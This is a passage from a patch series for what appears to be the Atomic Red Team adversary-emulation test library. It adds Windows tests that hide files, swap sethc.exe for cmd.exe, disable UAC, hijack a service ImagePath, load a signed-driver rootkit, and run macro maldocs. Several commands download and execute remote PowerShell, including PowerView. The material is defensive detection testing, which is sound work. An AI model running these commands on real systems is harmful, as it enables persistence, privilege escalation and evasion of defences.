Style](#atomic-test-5---grant-full-access-to-entire-c-drive-for-everyone---ryuk-ransomware-style)
@@ -155,7 +157,59 @@ attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt

-## Atomic Test #4 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style +## Atomic Test #4 - attrib - hide file +Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that +the victim does not see the file. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_or_folder | Path of the file or folder remove attribute. | path | %temp%\T1222.001_attrib_2| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt +attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt +``` + +#### Cleanup Commands: +```cmd +attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt +attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt +del #{file_or_folder}\T1222.001_attrib*.txt +rmdir #{file_or_folder} +``` + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Test requires a file to modify to be located at (#{file_or_folder}) +##### Check Prereq Commands: +```cmd +IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) +``` +##### Get Prereq Commands: +```cmd +mkdir #{file_or_folder} +echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt +echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt +``` + + + + +
+
+ +## Atomic Test #5 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style Invokes the command line used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **Supported Platforms:** Windows diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md index 0a0597d9..e36b7357 100644 --- a/atomics/T1546.008/T1546.008.md +++ b/atomics/T1546.008/T1546.008.md @@ -20,6 +20,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi - [Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes](#atomic-test-1---attaches-command-prompt-as-a-debugger-to-a-list-of-target-processes) +- [Atomic Test #2 - Replace binary of sticky keys](#atomic-test-2---replace-binary-of-sticky-keys) +
@@ -47,7 +49,7 @@ Upon successful execution, powershell will modify the registry and swap osk.exe $input_table = "#{parent_list}".split(",") $Name = "Debugger" $Value = "#{attached_process}" -Foreach ($item in $input_table){ +Foreach ($item in $input_table){ $item = $item.trim() $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" IF(!(Test-Path $registryPath)) @@ -76,4 +78,35 @@ Foreach ($item in $input_table) +
+
+ +## Atomic Test #2 - Replace binary of sticky keys +Replace sticky keys binary (sethc.exe) with cmd.exe + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe +takeown /F C:\Windows\System32\sethc.exe /A +icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t +copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe +``` + +#### Cleanup Commands: +```cmd +copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe +``` + + + + +
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 474cfe54..cd1a25c4 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -26,6 +26,8 @@ Another bypass is possible through some lateral movement techniques if credentia - [Atomic Test #7 - Bypass UAC using sdclt DelegateExecute](#atomic-test-7---bypass-uac-using-sdclt-delegateexecute) +- [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe) +
@@ -248,7 +250,7 @@ del "c:\testbypass.exe" >nul 2>nul
## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute -Bypasses User Account Control using a fileless method, registry only. +Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) @@ -283,4 +285,33 @@ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction I +
+
+ +## Atomic Test #8 - Disable UAC using reg.exe +Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key +HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands: +```cmd +reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f +``` + + + + +
diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md index 3a5aac6e..f07dc900 100644 --- a/atomics/T1574.011/T1574.011.md +++ b/atomics/T1574.011/T1574.011.md @@ -10,11 +10,13 @@ Adversaries may also alter Registry keys associated with service failure paramet - [Atomic Test #1 - Service Registry Permissions Weakness](#atomic-test-1---service-registry-permissions-weakness) +- [Atomic Test #2 - Service ImagePath Change with reg.exe](#atomic-test-2---service-imagepath-change-with-regexe) +
## Atomic Test #1 - Service Registry Permissions Weakness -Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. +Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" **Supported Platforms:** Windows @@ -41,4 +43,51 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F +
+
+ +## Atomic Test #2 - Service ImagePath Change with reg.exe +Change Service registry ImagePath of a bengin service to a malicious file + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| weak_service_name | weak service name | String | calcservice| +| weak_service_path | weak service path | String | %windir%\system32\win32calc.exe| +| malicious_service_path | malicious service path | String | %windir%\system32\cmd.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" +``` + +#### Cleanup Commands: +```cmd +sc.exe delete #{weak_service_name} +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: The service must exist (#{weak_service_name}) +##### Check Prereq Commands: +```powershell +if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" +``` + + + +
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e91c59e1..b37349ef 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -614,3 +614,12 @@ d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec f3a6cceb-06c9-48e5-8df8-8867a6814245 c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f +121de5c6-5818-4868-b8a7-8fd07c455c1b +2d943c18-e74a-44bf-936f-25ade6cccab4 +4c8db261-a58b-42a6-a866-0a294deedde4 +32b979da-7b68-42c9-9a99-0e39900fc36c +934e90cf-29ca-48b3-863c-411737ad44e3 +9e8af564-53ec-407e-aaa8-3cb20c3af7f9 +f38e9eea-e1d7-4ba6-b716-584791963827 +3723ab77-c546-403c-8fb4-bb577033b235 +60e860b6-8ae6-49db-ad07-5e73edd88f5d From 5832c65cb2875e23f6442d4c4f1cfa69d6d14560 Mon Sep 17 00:00:00 2001 From: Michael Haag Date: Mon, 30 Nov 2020 14:34:25 -0700 Subject: [PATCH 09/13] T1014 - Driver Rootkit Test Update (#1303) * T1014 - Driver rootkit test Fixed Test 3 per issue #1153 . - Added pre-req - New comments for additional info on retrieving the capcom driver - Added elevation required - Added new input argument for puppetstrings.exe Confirmed operational on win10. * Generate docs from job=validate_atomics_generate_docs branch=T1014 * Fixed GUID * Generate docs from job=validate_atomics_generate_docs branch=T1014 * Update used_guids.txt Co-authored-by: CircleCI Atomic Red Team doc generator --- atomics/Indexes/index.yaml | 38 ++++++++++++++++++++++++++------------ atomics/T1014/T1014.md | 22 ++++++++++++++++++---- atomics/T1014/T1014.yaml | 29 +++++++++++++++++++++++------ 3 files changed, 67 insertions(+), 22 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a13e2434..8f2af952 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -33399,27 +33399,41 @@ defense-evasion: elevation_required: true - name: Windows Signed Driver Rootkit Test auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae - description: | - This test exploits a signed driver to execute code in Kernel. - SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 - We leverage the work done here: - https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html - The hash of our PoC Exploit is - SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 - This will simulate hiding a process. - It would be wise if you only run this in a test environment + description: "This test exploits a signed driver to execute code in Kernel.\nThis + example was curated from a blog that utilizes puppetstrings.exe with the vulnerable + (signed driver) capcom.sys. \nThe capcom.sys driver may be found on github. + A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html\nSHA1 + C1D5CF8C43E7679B782630E93F5E6420CA1749A7\nWe leverage the work done here:\nhttps://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html\nThe + hash of our PoC Exploit is\nSHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441\nThis + will simulate hiding a process.\n" supported_platforms: - windows input_arguments: driver_path: - description: Path to the vulnerable driver + description: Path to a vulnerable driver type: Path default: C:\Drivers\driver.sys - executor: - command: 'puppetstrings #{driver_path} + puppetstrings_path: + description: Path of puppetstrings.exe + type: Path + default: PathToAtomicsFolder\T1014\bin\puppetstrings.exe + dependency_executor_name: powershell + dependencies: + - description: 'puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) ' + prereq_command: 'if (Test-Path #{puppetstrings_path}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" + -OutFile "#{puppetstrings_path}" + +' + executor: name: command_prompt + command: "#{puppetstrings_path} #{driver_path}\n" + elevation_required: true T1564.006: technique: external_references: diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 09b77975..e9f81566 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -124,13 +124,14 @@ sudo depmod -a ## Atomic Test #3 - Windows Signed Driver Rootkit Test This test exploits a signed driver to execute code in Kernel. +This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. +The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. -It would be wise if you only run this in a test environment **Supported Platforms:** Windows @@ -140,19 +141,32 @@ It would be wise if you only run this in a test environment #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys| +| driver_path | Path to a vulnerable driver | Path | C:\Drivers\driver.sys| +| puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder\T1014\bin\puppetstrings.exe| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd -puppetstrings #{driver_path} +#{puppetstrings_path} #{driver_path} ``` +#### Dependencies: Run with `powershell`! +##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}" +``` + +
diff --git a/atomics/T1014/T1014.yaml b/atomics/T1014/T1014.yaml index be1a5e72..5a467508 100644 --- a/atomics/T1014/T1014.yaml +++ b/atomics/T1014/T1014.yaml @@ -92,22 +92,39 @@ atomic_tests: auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae description: | This test exploits a signed driver to execute code in Kernel. + This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. + The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. - It would be wise if you only run this in a test environment + supported_platforms: - - windows + - windows + input_arguments: driver_path: - description: Path to the vulnerable driver + description: Path to a vulnerable driver type: Path default: C:\Drivers\driver.sys + puppetstrings_path: + description: Path of puppetstrings.exe + type: Path + default: PathToAtomicsFolder\T1014\bin\puppetstrings.exe + + dependency_executor_name: powershell + dependencies: + - description: | + puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) + prereq_command: | + if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}" + executor: - command: | - puppetstrings #{driver_path} name: command_prompt - + command: | + #{puppetstrings_path} #{driver_path} + elevation_required: true \ No newline at end of file From ffecea355a4048fedc4b88b3ef05e81df2b81dc3 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Mon, 30 Nov 2020 17:37:26 -0600 Subject: [PATCH 10/13] T1204.002 new atomic office bat (#1305) * Update T1204.002.yaml Added a new atomic to simulate an adversary using a malicious word doc to stage malicious .bat files in appdata then execute them. * Update T1204.002.yaml made default ms_office_version more robust to handle box with multiple versions of office. It will select the latest * Update T1204.002.yaml added in the description what the .bat does --- atomics/T1204.002/T1204.002.yaml | 35 ++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index c672a12a..23884776 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -139,3 +139,38 @@ atomic_tests: Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell +- name: Office launching .bat file from AppData + description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. + supported_platforms: + - windows + input_arguments: + bat_path: + description: Path to malicious .bat file + type: String + default: $env:temp+"\art1204.bat" + ms_office_version: + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + type: string + default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0] + ms_product: + description: Maldoc application Word or Excel + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: | + Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys + prereq_command: | + $ms_office_version = #{ms_office_version} + If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } + get_prereq_command: | + $msword = New-Object -ComObject word.application + Stop-Process -Name WINWORD + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $ms_office_version = #{ms_office_version} + $bat_path = #{bat_path} + $macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" + Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" + name: powershell From 7e10dda193afd43c8d38542b3f41a7db22170a4d Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Mon, 30 Nov 2020 18:27:55 -0600 Subject: [PATCH 11/13] Update T1204.002.yaml (#1307) Changed the ms_office_version argument on test 1-4 to pull the latest version of office from registry instead of defaulting to 16.0 Added cleanup commands to test 5 Changed commands in tests 1-4 to account for changes in ms_office_version --- atomics/T1204.002/T1204.002.yaml | 47 ++++++++++++++++++++------------ 1 file changed, 29 insertions(+), 18 deletions(-) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 23884776..e81b7f6e 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -6,7 +6,6 @@ atomic_tests: description: | This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. - This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader @@ -23,26 +22,29 @@ atomic_tests: type: String default: Word ms_office_version: - description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. type: String - default: "16.0" + default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0] dependency_executor_name: powershell dependencies: - description: | Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys prereq_command: | - If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } + $ms_office_version = #{ms_office_version} + If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } get_prereq_command: | $msword = New-Object -ComObject word.application Stop-Process -Name WINWORD executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $ms_office_version = #{ms_office_version} $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" - Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}" + Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" cleanup_command: | if (Test-Path #{jse_path}) { Remove-Item #{jse_path} } - Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore + $ms_office_version = #{ms_office_version} + Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 @@ -79,31 +81,33 @@ atomic_tests: type: String default: Word ms_office_version: - description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. type: String - default: "16.0" + default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0] dependency_executor_name: powershell dependencies: - description: | Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys prereq_command: | - If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } + $ms_office_version = #{ms_office_version} + If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } get_prereq_command: | $msword = New-Object -ComObject word.application Stop-Process -Name WINWORD executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $ms_office_version = #{ms_office_version} $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" - Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}" + Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" cleanup_command: | - Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore + $ms_office_version = #{ms_office_version} + Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell - name: OSTAP JS version auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911 description: | Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript - Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. supported_platforms: - windows @@ -117,26 +121,29 @@ atomic_tests: type: String default: Word ms_office_version: - description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. type: String - default: "16.0" + default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc) dependency_executor_name: powershell dependencies: - description: | Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys prereq_command: | - If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } + $ms_office_version = #{ms_office_version} + If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } get_prereq_command: | $msword = New-Object -ComObject word.application Stop-Process -Name WINWORD executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $ms_office_version = #{ms_office_version} $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" - Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}" + Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" cleanup_command: | + $ms_office_version = #{ms_office_version} if (Test-Path #{jse_path}) { Remove-Item #{jse_path} } - Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore + Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell - name: Office launching .bat file from AppData @@ -149,7 +156,7 @@ atomic_tests: type: String default: $env:temp+"\art1204.bat" ms_office_version: - description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. type: string default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0] ms_product: @@ -173,4 +180,8 @@ atomic_tests: $bat_path = #{bat_path} $macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" + cleanup_command: | + $ms_office_version = #{ms_office_version} + if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) } + Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell From 9ca764c258d1b38229355a4679dfe2108d638fc5 Mon Sep 17 00:00:00 2001 From: Murat ERDEM <52467052+moncasp@users.noreply.github.com> Date: Tue, 1 Dec 2020 17:19:19 +0300 Subject: [PATCH 12/13] Update T1033.yml (#1308) i seen a small error and fixed it --- atomics/T1033/T1033.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index ff657bfb..fb390d76 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -23,7 +23,7 @@ atomic_tests: quser qwinsta.exe /server:#{computer_name} qwinsta.exe - for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt + for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt name: command_prompt - name: System Owner/User Discovery From 90cc72063a0d4e3c12d99c002893822cdc80c6b1 Mon Sep 17 00:00:00 2001 From: MrOrOneEquals1 Date: Tue, 1 Dec 2020 07:40:10 -0700 Subject: [PATCH 13/13] dummy PR to cause documentation to be rebuilt (#1309) --- atomics/T1033/T1033.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index fb390d76..7c2d3e0b 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -50,4 +50,3 @@ atomic_tests: command: | IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Invoke-UserHunter -Stealth -Verbose name: powershell -